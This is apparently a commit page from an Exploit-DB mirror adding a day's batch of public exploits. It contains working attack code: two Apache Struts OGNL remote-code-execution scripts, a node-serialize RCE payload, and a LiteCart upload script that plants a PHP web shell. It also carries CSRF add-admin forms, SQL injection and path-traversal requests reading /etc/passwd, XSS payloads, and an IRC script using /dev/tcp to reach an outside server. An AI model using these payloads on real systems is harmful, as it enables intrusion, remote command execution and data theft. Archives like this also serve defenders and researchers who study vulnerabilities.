bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-08-28

Browse source 
25 changes to exploits/shellcodes

Firefox 55.0.3 - Denial of Service (PoC)
Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)
Libpango 1.40.8 - Denial of Service (PoC)
Adobe Flash - AVC Processing Out-of-Bounds Read

Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)
CuteFTP 5.0 - Buffer Overflow
Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)

OpenSSH 7.7 - Username Enumeration
OpenSSH 2.3 < 7.7 - Username Enumeration
Apache Struts 2.3 < 2.3.34 /  2.5 < 2.5.16 - Remote Code Execution (1)
Apache Struts 2.3 < 2.3.34 /  2.5 < 2.5.16 - Remote Code Execution (2)
Node.JS - 'node-serialize' Remote Code Execution
Electron WebPreferences - Remote Code Execution
HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)

Auditor Website 2.0.1 - Cross-Site Scripting
Basic B2B Script 2.0.0 - Cross-Site Scripting
Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting

Sentrifugo HRMS 3.2 - 'deptid' SQL Injection
WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting
Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)
LiteCart 2.1.2 - Arbitrary File Upload
Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection
Responsive FileManager < 9.13.4 - Directory Traversal
WordPress Plugin Plainview Activity Monitor 20161228 - Command Injection
This commit is contained in:
Offensive Security 2018-08-28 05:01:59 +00:00
parent aaa959b29c
commit 18e2848633
23 changed files with 1653 additions and 100 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

42
exploits/hardware/webapps/45264.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998
# Software : RICOH Printer
# Product Version: MP C4504ex
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection
# CVE : CVE-2018-15884
# CSRF vulnerability has been discovered on the printer of MP C4504ex of RICOH product.
# Low priviliage users are able to create administrator accounts
HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Cookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361
Connection: close
mode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
HTTP Response Request :
GET /success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close

100
exploits/hardware/webapps/45270.txt Normal file
View file

@ -0,0 +1,100 @@
------------------------------------------------------------------------
Seagate Media Server multiple SQL injection vulnerabilities
------------------------------------------------------------------------
Yorick Koster, September 2017
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Seagate Personal Cloud is a consumer-grade Network-Attached Storage
device (NAS). It was found that Seagate Media Server is affected by
multiple SQL injection vulnerabilities. An unauthenticated attacker can
exploit this issue to retrieve or modify arbitrary data in the database
used by Seagate Media Server. Seagate Media Server uses a separate
SQLite3 database, which limits what the attacker can do with this issue.
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was tested on a Seagate Personal Cloud model SRN21C running
firmware versions 4.3.16.0 and 4.3.18.0. It is likely that other
devices/models are also affected.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
These vulnerabilities have been fixed in firmware version 4.3.19.3.
http://knowledge.seagate.com/articles/en_US/FAQ/007752en
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2017/seagate-media-server-multiple-sql-injection-vulnerabilities.html
Seagate Media Server uses the Django web framework and is mapped to the .psp extension. Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.
/etc/lighttpd/conf.d/django-host.conf:
fastcgi.server += (
".psp"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
)),
".psp/"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
))
)
URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. It was found that many views contains SQL injection vulnerabilities. Since the number of issues is large only a selection of the identified issues is listed below.
/usr/lib/python2.7/site-packages/sms/Doc/core/documentSort.py (insecure use of format):
searchResult = self.dbObj.execute_command(RequestType.GETDICT, searchQuery.format(orderby = orderby,order = order,startwith_construct=startwith_construct), params = paramdict, priority = PriorityLevel.UI)
[...]
searchQuery = "Select id as UID, id, name, url, thumbUrl, size, approxFileSize, creationTime, approxCreationTime, type, extension, views, " \
"SUBSTR(album, 0, length(album) - 32) AS album, album AS albumId," \
"dirId, title as dtitle, dropboxSync , googleDriveSync from doc where album like :name escape '|' order by {orderby} {order} LIMIT :offset offset :start".format(orderby = orderby,order = order)
/usr/lib/python2.7/site-packages/sms/FolderView/core/Folder.py (unsafe string concatenation):
def allfiles(self, start, count, order, uid, orderby, folderOnly):
dirOrderby = "name"
if orderby == "creationTime":
dirOrderby = "creationTime"
countdirectory = "SELECT count(id) FROM directories WHERE parentdirId= '" + uid + "'"
dcount = 0
result = self.dbObj.execute_command(RequestType.GETONE, countdirectory, priority = PriorityLevel.UI)
if result:
dcount = result["data"]["result"][0]
count = int(count)
start = int(start)
tcount = start + count
if start <= dcount:
if tcount > dcount:
ocount = tcount - dcount
searchfolder = "SELECT id, name, url, parentdirId, creationTime, thumbUrl FROM directories WHERE parentdirId= '" + uid + "' ORDER BY " + dirOrderby + " " + order + " LIMIT " + str(count) + " OFFSET " + str(start)
Similar issues were observed in the following files (non-exhaustive list):
- /usr/lib/python2.7/site-packages/sms/Music/core/musicSort.py
- /usr/lib/python2.7/site-packages/sms/Music/views.py
- /usr/lib/python2.7/site-packages/sms/Photo/core/photoSort.py
- /usr/lib/python2.7/site-packages/sms/Photo/views.py
- /usr/lib/python2.7/site-packages/sms/Video/core/videoSort.py
- /usr/lib/python2.7/site-packages/sms/Video/views.py
Proof of concept
The following proof of concept can be used to verify this issue.
http://personalcloud.local/folderViewAllFiles.psp?start=0&count=60&url=%2F&dirId=\'+union+select+null,name,null,sql,null,null+from+sqlite_master+--+'

24
exploits/ios/dos/45261.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-26
# Vendor Homepage: https://www.trendmicro.com/en_se/business/products/user-protection/sps/mobile.html
# Software Link: App Store for iOS devices
# Tested Version: 2.0.0.1700
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1
# Steps to Produce the Crash:
# 1.- Run python code: Enterprise_Mobile_Security_2.0.0.1700.py
# 2.- Copy content to clipboard
# 3.- Open App Enterprise Mobile Security
# 4.- Inscribirse manualmente
# 5.- Servidor local
# 6.- Paste ClipBoard on "Servidor:"
# 7.- Puerto: 80
# 8.- Siguiente
# 9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 153844
print (buffer)

108
exploits/linux/dos/45263.sh Executable file
View file

@ -0,0 +1,108 @@
# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC)
# Date: 2018-08-06
# Exploit Author: Jeffery M
# Vendor Homepage: https://www.pango.org/
# Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz
# Version: 1.40.8+
# Tested on: Windows 7, Gentoo
# CVE : CVE-2018-15120
# Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f
# Description:
# Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the
# Emoji iter code into returning an empty segment, which then triggers
# an assertion in the itemizer.
# POC:
# Save the below as irc_com_dump; chmod +x irc_com_dump;connect to an
# irc server with something linked against libpango 1.40.8 or higher
# (e.g. hexchat 2.14.1 [ can be obtained on my server
# http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run
# the following:
irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
This is a rudimentary example of how this attack can be used.
#!/bin/bash
# Name: irc_com_dump
# Save this script as irc_com_dump
# run as follows on irc.laks.ml or a server of your choice
# irc_com_dump $'privmsg someuser :\u2665\uFE0E\uFE0F'
# When the user receives the message it will trigger the assertion fail.
###
helpfunc ()
{
sed -nre '/sed/d;/bash/,/###/{1d;s/^# //g;s/###//;p}' $0;
}
if [[ $# -lt 1 ]] || [[ $1 =~ ^-?-h ]] ; then
helpfunc && exit 1
fi
# So we can send unicode without having to do shit.
LC_ALL=en_US.utf8
export LC_ALL
export allargs=("$@")
#test_ping ()
#{
# if [[ ! -n $PING ]]; then
# export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
# fi;
#}
if [[ -n ${DEBUG} ]] ; then
declare -p allargs
fi
export name=magicrun${RANDOM}
if [[ -n ${NORANDOM} ]] ; then
export name=magicdebug
fi
run_irc_com ()
{
set -vx
echo ${allargs[1]}
# if ( ( ( [[ ! ${allargs[1]} =~ [a-zA-Z].* ]] || true) && ( [[
${allargs[1]} =~ [0-9].*[0-9] ]] && [[ ! ${allargs[0]} =~ .*[.].*
]] || true) ) ) ; then
if [[ ! ${allargs[0]} =~ .*[.].* && ${allargs[1]} =~ ^[0-9]+[0-9]?$
&& ! ${allargs[1]} =~ .*[a-zA-Z].* || $# -eq 1 ]] ; then
export COMM="$@";
else
export s=$1
export p=$2
export COMM="${@:3}"
if [[ $p =~ .*[a-zA-Z] ]] ; then
unset s p
export COMM="${allargs[@]}"
fi
fi
test -z $s||false && exec 5<> /dev/tcp/irc.laks.ml/6667 || test
-n $s && echo s is $s;exec 5<>/dev/tcp/$s/$p
set +vx
echo -e 'USER '${name}' 8 ''*'' :'${name}'\nNICK '${name}'\n' 1>&5
2>&1 | stdbuf -i0 -o0 cat - 0<&5 > /dev/stdout | while read h; do
if [[ ! -n $PING ]]; then
export PING="$(echo $h| awk '/PING/{print "PONG "$2}')";
fi;
## test_ping;
echo -e "${PING}\n" 1>&5
if [[ ! -n $PINGSENT ]] && [[ -n $PING ]] ; then
export PINGSENT=isentmyping;
fi;
if [[ -z $COMMSENT ]] && [[ -n $PINGSENT ]] && [[ -n $PING ]] ; then
echo -e "${COMM}\nQUIT\n" 1>&5 2>&1
fi
echo "$h" 2>&1;
done
}
run_irc_com ${allargs[@]} |& sed -ne "/:$name MODE $name
:+iwx/,/\x04/p" | sed -e "/:$name MODE $name/d" -e '/^ERROR
:Closing/d' | awk -F" $name " '{print $2}'

9
exploits/linux/dos/45268.txt Normal file
View file

@ -0,0 +1,9 @@
The attached fuzz file causes an out-of-bounds read in AVC processing. To reproduce the issue, put both attached files on a server, and vist:
http://127.0.0.1/LoadMP4.swf?file=transpose.mp4
This issue reproduces on Chrome and Firefox for Linux.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45268.zip

226
exploits/linux/remote/45260.py Executable file
View file

@ -0,0 +1,226 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code uses a payload from:
# https://github.com/jas502n/St2-057
# *****************************************************
import argparse
import random
import requests
import sys
try:
from urllib import parse as urlparse
except ImportError:
import urlparse
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'id')",
action='store',
default='id')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Accept': '*/*'
}
timeout = 3
def parse_url(url):
"""
Parses the URL.
"""
# url: http://example.com/demo/struts2-showcase/index.action
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme
# Site: http://example.com
site = scheme + '://' + urlparse.urlparse(url).netloc
# FilePath: /demo/struts2-showcase/index.action
file_path = urlparse.urlparse(url).path
if (file_path == ''):
file_path = '/'
# Filename: index.action
try:
filename = url.split('/')[-1]
except IndexError:
filename = ''
# File Dir: /demo/struts2-showcase/
file_dir = file_path.rstrip(filename)
if (file_dir == ''):
file_dir = '/'
return({"site": site,
"file_dir": file_dir,
"filename": filename})
def build_injection_inputs(url):
"""
Builds injection inputs for the check.
"""
parsed_url = parse_url(url)
injection_inputs = []
url_directories = parsed_url["file_dir"].split("/")
try:
url_directories.remove("")
except ValueError:
pass
for i in range(len(url_directories)):
injection_entry = "/".join(url_directories[:i])
if not injection_entry.startswith("/"):
injection_entry = "/%s" % (injection_entry)
if not injection_entry.endswith("/"):
injection_entry = "%s/" % (injection_entry)
injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload.
injection_entry += parsed_url["filename"]
injection_inputs.append(injection_entry)
return(injection_inputs)
def check(url):
random_value = int(''.join(random.choice('0123456789') for i in range(2)))
multiplication_value = random_value * random_value
injection_points = build_injection_inputs(url)
parsed_url = parse_url(url)
print("[%] Checking for CVE-2018-11776")
print("[*] URL: %s" % (url))
print("[*] Total of Attempts: (%s)" % (len(injection_points)))
attempts_counter = 0
for injection_point in injection_points:
attempts_counter += 1
print("[%s/%s]" % (attempts_counter, len(injection_points)))
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
continue
if "Location" in resp.headers.keys():
if str(multiplication_value) in resp.headers['Location']:
print("[*] Status: Vulnerable!")
return(injection_point)
print("[*] Status: Not Affected.")
return(None)
def exploit(url, cmd):
parsed_url = parse_url(url)
injection_point = check(url)
if injection_point is None:
print("[%] Target is not vulnerable.")
return(0)
print("[%] Exploiting...")
payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
return(1)
print("[%] Response:")
print(resp.text)
return(0)
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), "r")
URLs_List = f_file.read().replace("\r", "").split("\n")
try:
URLs_List.remove("")
except ValueError:
pass
f_file.close()
except Exception as e:
print("Error: There was an error in reading list file.")
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
print("[%] Done.")
if __name__ == "__main__":
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)

3
exploits/linux/remote/45265.js Normal file
View file

@ -0,0 +1,3 @@
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);

50
exploits/multiple/remote/45262.py Executable file
View file

@ -0,0 +1,50 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
import sys
import urllib
import urllib2
import httplib
def exploit(host,cmd):
print "[Execute]: {}".format(cmd)
ognl_payload = "${"
ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
ognl_payload += "(#cmd='{}').".format(cmd)
ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
ognl_payload += "(#p.redirectErrorStream(true))."
ognl_payload += "(#process=#p.start())."
ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
ognl_payload += "(#ros.flush())"
ognl_payload += "}"
if not ":" in host:
host = "{}:8080".format(host)
# encode the payload
ognl_payload_encoded = urllib.quote_plus(ognl_payload)
# further encoding
url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))
print "[Url]: {}\n\n\n".format(url)
try:
request = urllib2.Request(url)
response = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
response = e.partial
print response
if len(sys.argv) < 3:
sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
exploit(sys.argv[1],sys.argv[2])

28
exploits/multiple/remote/45272.txt Normal file
View file

@ -0,0 +1,28 @@
CVE-2018-15685 - Electron WebPreferences Remote Code Execution
This is a minimal Electron application with a POC for CVE-2018-15685.
A remote code execution vulnerability has been discovered affecting apps with the ability to open nested child windows on Electron versions (3.0.0-beta.6, 2.0.7, 1.8.7, and 1.7.15). This vulnerability has been assigned the CVE identifier CVE-2018-15685.
For more information see my full write up on the Contrast Security blog (https://www.contrastsecurity.com/security-influencers/cve-2018-15685) or the write up on the offical blog from Electron (https://electronjs.org/blog/web-preferences-fix)
The project contains the fillowing files:
main.js - This is the app's main process. Note this has nodeIntegration disabled so it should not be possibe use "process"
index.html - This is an example rendered page. This could be remotely controlled URL, or a page from an application with an XSS. In this example even though it is a local file but should not have access to node bindings.
You can learn more about each of these components within the Quick Start Guide.
To Use
To clone and run this repository you'll need Git and Node.js (which comes with npm) installed on your computer. From your command line:
# Clone this repository
git clone https://github.com/matt-/CVE-2018-15685
# Go into the repository
cd CVE-2018-15685
# Install dependencies
npm install
# Run the app
npm start
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45272.zip

26
exploits/php/webapps/45125.txt
View file

@ -1,26 +0,0 @@
*******************************************************************************************
# Exploit Title: Chartered Accountant : Auditor Website 2.0.1 - Reflected , Stored XSS
# Date: 26.06.2018
# Site Titel : Find your needs on Domain Name
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/cms-auditor-website/
# Category: Web Application
# Version: 2.0.1
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 -Firefox
# CVE: CVE-2018-13256
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site ( http://server/auditor/ ) .
2- Select REGISTER page (Register now) .
3- Create an account using your Email address => in FIRST NAME , LAST NAME ,and PASSWORD put this script <img src =x onError=alert("VIKAS")>
4- Now Check your Email and verify it .
5- Again come to site and login it using your verified Email and Password .
6- You will having popup VIKAS in you account when you loged in .
***************************************************************************************

40
exploits/php/webapps/45140.txt
View file

@ -1,40 +0,0 @@
*******************************************************************************************
# Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields.
# Date: 20.07.2018
# Site Titel : B2B Script
# Vendor Homepage: https://www.phpscriptsmall.com/
#Vendor Software : https://www.phpscriptsmall.com/product/professional-b2b-script/
# Software Link: http://readymadeb2bscript.com/basic-b2b/
# Category: Web Application
# Version: 2.0.9
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
#Published on : https://gkaim.com/cve-2018-14541-vikas-chaudhary/
# Tested on: Windows 10 -Firefox
# CVE- CVE-2018-14541
*****************************************************************************************
Proof of Concept:-
--------------------------
1. Go to the site (https://www.server.com/professional-b2b-script/ ).
2- Click on Join Free => Fill the Form and Create an Account using your name email and soo on ...
3- Goto your mail and Verify it.
4-Come back to site and Login using your Verified Mail and Password.
6- When loged in ,goto My Profile => Edit Profile and fill the these Scripts in given parameter.
in FIRST NAME => "><img src=x onerror=prompt(/VIKAS/)>
in LAST NAME => "><img src=x onerror=prompt(/CHAUDHARY/)>
in ADDRESS 1 => "><img src=x onerror=prompt(/MYAIM/)>
in ADDRESS 2 => "><img src=x onerror=prompt(/GKAIM/)>
in CITY => "><img src=x onerror=prompt(/HRFP/)>
in STATE => "><img src=x onerror=prompt(/ETHICAL/)>
in COMPANY NAME => "><img src=x onerror=prompt(/HACKER/)>
Now click on SUBMIT and refresh the page
You will having popup of /VIKAS/ , /CHAUDHARY/ , / MYAIM/ . /GKAIM/ , /HRPF/ , /ETHICAL/ , /HACKER/ in you account..
***************************************************************************************

28
exploits/php/webapps/45141.txt
View file

@ -1,28 +0,0 @@
*******************************************************************************************
# Exploit Title: Entrepreneur Job Portal Script 3.0.1- has Stored XSS via Search bar and Location
# Date: 14.07.2018
# Site Titel : JOB SITE (Job Portal)
# Vendor Homepage: https://www.phpscriptsmall.com/
#Vendor Software: https://www.phpscriptsmall.com/product/entrepreneur-job-portal-script/
# Software Link: http://freelancewebdesignerchennai.com/demo/job-portal/
# Category: Web Application
# Version: 3.0.1
# Exploit Author: Vikas Chaudhary
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
#Published On: https://gkaim.com/cve-2018-14082-vikas-chaudhary/
# Tested on: Windows 10 -Firefox ,
# CVE: CVE-2018-14082
*****************************************************************************************
------------------------------------------------------ .
Proof of Concept:-
-------------------------------------------------------
1. Go to the site ( http://server.com/job-portal/ ) .
2- Click on REGISTER page (Register now) .
3- Register by giving you name ,mail and soo on...
4- Verify your mail
5- Come to side and login using your verified mail
6 -When you Loged in
In search bar (keywords, skills , Destination) paste "><svg/onload=alert(/VIKAS/)> and in location paste "><svg/onload=alert(/CHAUDHARY/)> and click on Search
7-You will have 2 popup=> /VIKAS/ and /CHAUDHARY/

33
exploits/php/webapps/45258.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-24
# Exploit Author: GunEggWang
# Vendor Homepage: https://gleezcms.org/
# Software Link: https://github.com/gleez/cms
# Version: 1.2.0
# CVE : CVE-2018-15845
# Description:
# There is a CSRF vulnerability that can add an administrator account in
# Gleez CMS 1.2.0 via admin/users/add. (https://github.com/gleez/cms/issues/800)
# After the administrator logged in,open the POC,that will create an new admin account unexcused.
# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server/admin/users/add?0=" method="POST">
<input type="hidden" name="_token" value="18eabd0645699b3eec1686301a684392e8a4735a" />
<input type="hidden" name="_action" value="909998bbc9e60ce40ae378a1055b46f3" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="pass" value="test" />
<input type="hidden" name="nick" value="test" />
<input type="hidden" name="mail" value="admin@admin.cc" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="roles[admin]" value="Administrative user, has access to everything." />
<input type="hidden" name="site_url" value="http://server/" />
<input type="hidden" name="user" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

74
exploits/php/webapps/45267.py Executable file
View file

@ -0,0 +1,74 @@
# Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload
# Date: 2018-08-27
# Exploit Author: Haboob Team
# Software Link: https://www.litecart.net/downloading?version=2.1.2
# Version: 2.1.2
# CVE : CVE-2018-12256
# 1. Description
# admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers
# to upload a malicious file (resulting in remote code execution) by using the text/xml
# or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request.
# 2. Proof of Concept
#!/usr/bin/env python
import mechanize
import cookielib
import urllib2
import requests
import sys
import argparse
import random
import string
parser = argparse.ArgumentParser(description='LiteCart')
parser.add_argument('-t',
help='admin login page url - EX: https://IPADDRESS/admin/')
parser.add_argument('-p',
help='admin password')
parser.add_argument('-u',
help='admin username')
args = parser.parse_args()
if(not args.u or not args.t or not args.p):
sys.exit("-h for help")
url = args.t
user = args.u
password = args.p
br = mechanize.Browser()
cookiejar = cookielib.LWPCookieJar()
br.set_cookiejar( cookiejar )
br.set_handle_equiv( True )
br.set_handle_redirect( True )
br.set_handle_referer( True )
br.set_handle_robots( False )
br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ]
response = br.open(url)
br.select_form(name="login_form")
br["username"] = user
br["password"] = password
res = br.submit()
response = br.open(url + "?app=vqmods&doc=vqmods")
one=""
for form in br.forms():
one= str(form).split("(")
one= one[1].split("=")
one= one[1].split(")")
one = one[0]
cookies = br._ua_handlers['_cookies'].cookiejar
cookie_dict = {}
for c in cookies:
cookie_dict[c.name] = c.value
rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
files = {
'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"),
'token':one,
'upload':(None,"Upload")
}
response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict)
r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id")
if r.status_code == 200:
print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id"
print r.content
else:
print "Sorry something went wrong"

57
exploits/php/webapps/45271.txt Normal file
View file

@ -0,0 +1,57 @@
The following vulnerabilities were fixed in the version 9.13.4.
https://responsivefilemanager.com
#1 Path Traversal Allows to Read Any File
Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed
Details:
The following request allows a user to read any file on the system.
GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
X-Requested-With: XMLHttpRequest
Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5
Connection: close
#2 Path Traversal While Upacking Archives
Reserved CVE: CVE-2018-15536
Discovered By: Simon Uvarov
Vendor Status: Fixed
The following request starts unpacking the exploit.zip archive:
POST /filemanager/ajax_calls.php?action=extract HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
